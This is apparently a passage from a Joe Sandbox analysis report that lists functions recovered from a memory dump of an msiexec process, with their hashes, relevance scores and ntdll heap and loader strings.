                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                        • API String ID: 0-336120773
                                                                        • Opcode ID: 9c02640065e4b34b019cb535b92ac012c8874d392eac1377c161aa2825d59413
                                                                        • Instruction ID: 0392575a5252ac1995ceedbfd014958051e95b3ffcc34317829fa0bf27788118
                                                                        • Opcode Fuzzy Hash: 9c02640065e4b34b019cb535b92ac012c8874d392eac1377c161aa2825d59413
                                                                        • Instruction Fuzzy Hash: B73110B9290310EFD700CB98C9A0F9AB7E8FF15364F210156F505CB2A1DA34EF80DA61
                                                                        Function 220E9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                        • API String ID: 0-1391187441
                                                                        • Opcode ID: 744cfe828deb6f2b1b8b4dd5808ab18cb516fbe67b2f19bcc0fd67f58ce85686
                                                                        • Instruction ID: b5f5844a2c4b0daa51b1b2dc30ee3fbc2579a66be6992fedd003c25f8c47dfdc
                                                                        • Opcode Fuzzy Hash: 744cfe828deb6f2b1b8b4dd5808ab18cb516fbe67b2f19bcc0fd67f58ce85686
                                                                        • Instruction Fuzzy Hash: 5A31C036E40318AFD701CB44C884F9EB7F9EF45724F2040A2E919AB291DB70DA80DA60
                                                                        Function 22100770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 0e5793243f581000e6f3f7808f322e4e94d73b8d4ac9d48264f6da70935a1a68
                                                                        • Instruction ID: 1da90496609f6db39e976794e3e4428be70192d8579e951aca152d890a9153c1
                                                                        • Opcode Fuzzy Hash: 0e5793243f581000e6f3f7808f322e4e94d73b8d4ac9d48264f6da70935a1a68
                                                                        • Instruction Fuzzy Hash: 41F17A70A80705EFD715CF68C990FAAB7B5FF54304F1082A9E9659B392D734AB81CB90
                                                                        Function 220FB6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                        • API String ID: 0-1145731471
                                                                        • Opcode ID: c97e271a931b07fec3bbb265a7032c3d5590d35d5b8594c82ca83e896e6091e6
                                                                        • Instruction ID: ad08141487e741f1c3abfef3c38a45c8815b28aa1e1f8781e06a741d5d0f10e9
                                                                        • Opcode Fuzzy Hash: c97e271a931b07fec3bbb265a7032c3d5590d35d5b8594c82ca83e896e6091e6
                                                                        • Instruction Fuzzy Hash: 8CB1AD31A847548FCB19CF69C980F9EB7B1BF88318F144669E961EB380DB74EA51CB50
                                                                        Function 2217368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                        • API String ID: 0-2391371766
                                                                        • Opcode ID: 08b14dad35ab5d3f353099916582a8197a8e7e98bcb322aeefc3c0224211bcb4
                                                                        • Instruction ID: d1d9c0f9bc1a6e4d499e6131fab60e70c76faa9c6151ac4d4dd55856267257cf
                                                                        • Opcode Fuzzy Hash: 08b14dad35ab5d3f353099916582a8197a8e7e98bcb322aeefc3c0224211bcb4
                                                                        • Instruction Fuzzy Hash: AFB1ACB26C4385AFE311CF94C981F9BB7F8AB84714F010929FA50DB291D774EA44CB92
                                                                        Function 220EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: 528dc4cc950b316e14e9d99d0c4a5c0757d79e4be6d080a928f65961a07cf9b6
                                                                        • Instruction ID: cdbc89eeb75b43dcbe406152ce5c3d4dec49cab054f285a300eb2d8d1547824e
                                                                        • Opcode Fuzzy Hash: 528dc4cc950b316e14e9d99d0c4a5c0757d79e4be6d080a928f65961a07cf9b6
                                                                        • Instruction Fuzzy Hash: 47A14671D413299ADB219B64CD88FDAB7B8AB48714F1001EAEA0DA7210DB359F84CF60
                                                                        Function 221836EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                        • API String ID: 0-318774311
                                                                        • Opcode ID: 3e3d4d28a1bbb07b91a650bb98737dd14bdeade79462fdf56c5054a0c3eb73f4
                                                                        • Instruction ID: 55d7d8f9d0a07fb471b993cca04aab6ba6db15bde587885a4eb6fa63699afc22
                                                                        • Opcode Fuzzy Hash: 3e3d4d28a1bbb07b91a650bb98737dd14bdeade79462fdf56c5054a0c3eb73f4
                                                                        • Instruction Fuzzy Hash: 97815B71689341AFE3158F14C980FAAB7E8EF85754F080A69FE909B390D774DA04CF62
                                                                        Function 2212909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$&$@
                                                                        • API String ID: 0-1537733988
                                                                        • Opcode ID: 9a9cd5b3f6b5651a845be472c4439efc46645f722bee94e08c10d6257c26deca
                                                                        • Instruction ID: 2ff45f614e6ebe4e793c7219050cd0aed14adc9d4c4a29e7b134d847288cf6d0
                                                                        • Opcode Fuzzy Hash: 9a9cd5b3f6b5651a845be472c4439efc46645f722bee94e08c10d6257c26deca
                                                                        • Instruction Fuzzy Hash: ED71AD70588B559FC314CF29CA80E5BBBEABF94318F204A1DF5A947245C731DB05CB92
                                                                        Function 221CB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • TargetNtPath, xrefs: 221CB82F
                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 221CB82A
                                                                        • GlobalizationUserSettings, xrefs: 221CB834
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                        • API String ID: 0-505981995
                                                                        • Opcode ID: 30b9d4132dd4c1426082972e2299cb1d51e6f2a836c8b0692cabac50c845d4d1
                                                                        • Instruction ID: 101a0964c787d60da6c19968d294b9b901ee97bafad78dd61fae88f6c05dca4d
                                                                        • Opcode Fuzzy Hash: 30b9d4132dd4c1426082972e2299cb1d51e6f2a836c8b0692cabac50c845d4d1
                                                                        • Instruction Fuzzy Hash: 33614F76981329AFDB659F54CC88FDAB7B8AB24714F0101E5AA08E7250D7349F84CF91
                                                                        Function 220EF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • HEAP[%wZ]: , xrefs: 2214E6A6
                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 2214E6C6
                                                                        • HEAP: , xrefs: 2214E6B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                        • API String ID: 0-1340214556
                                                                        • Opcode ID: c36229ad95703dc960d7fcd268e2b2d195583c17b169a9ec707ec7dc0734c7f0
                                                                        • Instruction ID: a1cc5f16f5b6d15cbd0f8be9fa17d9342aeecde1a1130b185c53042829bea46e
                                                                        • Opcode Fuzzy Hash: c36229ad95703dc960d7fcd268e2b2d195583c17b169a9ec707ec7dc0734c7f0
                                                                        • Instruction Fuzzy Hash: 53511835644784EFE312CB64CA98F9ABBF8FF05304F1401A5E5998B692DB74EB40DB50
                                                                        Function 2212C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 221682E8
                                                                        • Failed to reallocate the system dirs string !, xrefs: 221682D7
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 221682DE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: 3a87eed6763f0e1237dde852d69db9a5b8a512296a4b7b720b902fcab9944f6f
                                                                        • Instruction ID: 398315103d96d0164e8c42d73e7cfda739ded6a0f5c87c261fe049ae5ee8ce2f
                                                                        • Opcode Fuzzy Hash: 3a87eed6763f0e1237dde852d69db9a5b8a512296a4b7b720b902fcab9944f6f
                                                                        • Instruction Fuzzy Hash: DD41D0B1AD4710EFC720DBA4CD40F9B77E8AB48750F420A2ABE4897295E774DB00CB91
                                                                        Function 221216CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 22161B39
                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 22161B4A
                                                                        • LdrpAllocateTls, xrefs: 22161B40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                        • API String ID: 0-4274184382
                                                                        • Opcode ID: ad550f9d42e7ff6dab7d5b048b1d90d63f7670624875147b117722f1563971a8
                                                                        • Instruction ID: 4293f14aafd9d910d7e9118bd7235136d8ad9d5cee40d8fe4c3d7b758a874188
                                                                        • Opcode Fuzzy Hash: ad550f9d42e7ff6dab7d5b048b1d90d63f7670624875147b117722f1563971a8
                                                                        • Instruction Fuzzy Hash: A3416975E80749AFDB15CFA8C981EAEBBF5FF98304F114619E805A7220D735AA00CB90
                                                                        Function 221AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • PreferredUILanguages, xrefs: 221AC212
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 221AC1C5
                                                                        • @, xrefs: 221AC1F1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: 67254abbd143b8a4c0d1c95607b275819a67ee120ce9257e9c7b625bf371ab34
                                                                        • Instruction ID: 7c928d51665498d75956776789b2174d61b2803a98a0a2d88d361336b3a2a91a
                                                                        • Opcode Fuzzy Hash: 67254abbd143b8a4c0d1c95607b275819a67ee120ce9257e9c7b625bf371ab34
                                                                        • Instruction Fuzzy Hash: BD416A76A80309AFDB11CBD4C9A1FEEB7B9AB14B14F10416BEA15F7280D7749B44CB90
                                                                        Function 22184144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: 955d080cfc18e6edcab409303a70b666630e89ee7cdfd14c0e88b809b876261e
                                                                        • Instruction ID: 80de4bc3707b0ce5b23d5678aaff34102fb9e2b8e3f633fde5518f850421a417
                                                                        • Opcode Fuzzy Hash: 955d080cfc18e6edcab409303a70b666630e89ee7cdfd14c0e88b809b876261e
                                                                        • Instruction Fuzzy Hash: 2741FD329887588FEB11CBA4D981FADBBB9EF65354F20055AD900AB391DA349B01CF12
                                                                        Function 22174755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 22174888
                                                                        • LdrpCheckRedirection, xrefs: 2217488F
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 22174899
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        • Opcode ID: 2b2a7f9c2a5433f59a6807aa7eb2566724be2f8b0adf8b492f217e214b518fe4
                                                                        • Instruction ID: aa20d72009cea0b3d586a0e56b6e20b34212964eb7cd10e7fb209915b7f8a2d9
                                                                        • Opcode Fuzzy Hash: 2b2a7f9c2a5433f59a6807aa7eb2566724be2f8b0adf8b492f217e214b518fe4
                                                                        • Instruction Fuzzy Hash: EF419272F84794DFCB11CEA8C942E967BF4AFC9650F06066DED9497215D730DA00CB91
                                                                        Function 221233A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlCreateActivationContext, xrefs: 221629F9
                                                                        • Actx , xrefs: 221233AC
                                                                        • SXS: %s() passed the empty activation context data, xrefs: 221629FE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                        • API String ID: 0-859632880
                                                                        • Opcode ID: 50996e32995c6a37559a7f847593c1199067f97de387b905f7fa8a0d413e48b9
                                                                        • Instruction ID: 408358d44b85b49b10227378f9dba776389bee56d36ca9c730bcb35c3df01374
                                                                        • Opcode Fuzzy Hash: 50996e32995c6a37559a7f847593c1199067f97de387b905f7fa8a0d413e48b9
                                                                        • Instruction Fuzzy Hash: C53142322817659FEB16CF58C980FAA37A4FB44714F1585A9FE049F282CBB1DB51CB90
                                                                        Function 22121607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 22161A51
                                                                        • DLL "%wZ" has TLS information at %p, xrefs: 22161A40
                                                                        • LdrpInitializeTls, xrefs: 22161A47
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                        • API String ID: 0-931879808
                                                                        • Opcode ID: 39d4785dc70b7036c2a3d55cb07358fad6596d42cc359eabe548546e6cc2f00a
                                                                        • Instruction ID: e34328e3652cf0bd2b6bc656cd8ebe82a9b4cda08c7862e38f5042fd74e2de39
                                                                        • Opcode Fuzzy Hash: 39d4785dc70b7036c2a3d55cb07358fad6596d42cc359eabe548546e6cc2f00a
                                                                        • Instruction Fuzzy Hash: D831B032AC0B54BFE710CF88CD85FAEB6B9FB50354F050619F904AB1A1D6A4AB0087A0
                                                                        Function 22131270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • @, xrefs: 221312A5
                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 2213127B
                                                                        • BuildLabEx, xrefs: 2213130F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                        • API String ID: 0-3051831665
                                                                        • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                        • Instruction ID: 081344a57e56b2bc2520cdd0625a8eba19db864f63ce33a7115e41ff57457d4d
                                                                        • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                        • Instruction Fuzzy Hash: A931907198071CEFDB129FA5CD40EEFBBBAEB94724F014025EA14A7260D7309B05CB90
                                                                        Function 221720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 22172104
                                                                        • LdrpInitializationFailure, xrefs: 221720FA
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 221720F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: 821ed48db31d0917e6f430c447454ed43abc054818d2a23e275acce2992e3415
                                                                        • Instruction ID: d6e83afbbb1aad93c43a56ca06183f2d94745944496f1c05f73f97dcf6f2a558
                                                                        • Opcode Fuzzy Hash: 821ed48db31d0917e6f430c447454ed43abc054818d2a23e275acce2992e3415
                                                                        • Instruction Fuzzy Hash: B5F0C8717C1308BFE718DA88CD52FEA77B8EB84754F500459FA007B685D6F0AB01D691
                                                                        Function 221003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: 4ca3855d24f11f3f32619f95770e7b20cc3fc905ef4d1c3713a14055ecf70576
